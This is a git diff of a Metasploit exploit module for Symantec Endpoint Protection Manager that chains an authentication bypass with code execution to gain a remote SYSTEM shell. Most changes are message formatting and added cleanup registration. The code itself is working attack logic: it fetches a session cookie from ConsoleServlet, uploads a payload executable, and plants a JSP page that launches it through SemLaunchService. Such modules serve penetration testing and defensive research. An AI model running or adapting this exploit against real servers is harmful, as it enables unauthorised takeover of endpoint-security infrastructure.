diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb index 06e9a54757..f6deac9ab2 100644 --- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb +++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb @@ -8,20 +8,21 @@ require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking + include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, - 'Name' => "Symantec Endpoint Protection Manager Auth Bypass and RCE", + 'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution', 'Description' => %q{ - This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager - in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM + This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager + in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. }, 'License' => MSF_LICENSE, 'Author' => [ - 'bperry', #metasploit module - 'Markus Wulftange' #discovery + 'Markus Wulftange', #discovery + 'bperry' # metasploit module ], 'References' => [ @@ -36,12 +37,14 @@ class Metasploit4 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { - 'Arch' => ARCH_X86, - 'Payload' => { - 'DisableNops' => true + [ 'Automatic', + { + 'Arch' => ARCH_X86, + 'Payload' => { + 'DisableNops' => true + } } - } ], + ], ], 'Privileged' => true, 'DisclosureDate' => 'Jul 31 2015', @@ -58,7 +61,7 @@ class Metasploit4 < Msf::Exploit::Remote meterp = Rex::Text.rand_text_alpha(10) jsp = Rex::Text.rand_text_alpha(10) - print_status("Getting cookie") + print_status("#{peer} - Getting cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), @@ -70,21 +73,21 @@ class Metasploit4 < Msf::Exploit::Remote } }) - unless res - fail_with(Failure::Unknown, 'The server did not respond in an expected way') + unless res && res.code == 200 + fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way") end cookie = res.get_cookies - if cookie == nil || cookie == '' - fail_with(Failure::Unknown, 'The server did not return a cookie to use in the later requests.') + if cookie.nil? || cookie.empty? + fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie") end exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%> <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %> } - print_status('Uploading payload...') + print_status("#{peer} - Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', @@ -100,10 +103,12 @@ class Metasploit4 < Msf::Exploit::Remote }) unless res && res.code == 200 - fail_with(Failure::Unknown, 'Server did not respond in an expected way') + fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way") end - print_status("Uploading JSP page to execute the payload...") + register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe") + + print_status("#{peer} - Uploading JSP page to execute the payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', @@ -119,12 +124,14 @@ class Metasploit4 < Msf::Exploit::Remote }) unless res && res.code == 200 - fail_with(Failure::Unknown, 'Server did not respond in an expected way.') + fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way") end - print_status('Executing payload. Manual cleanup will be required.') + register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp") + + print_status("#{peer} - Executing payload. Manual cleanup will be required.") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp") - }) + }, 5) end end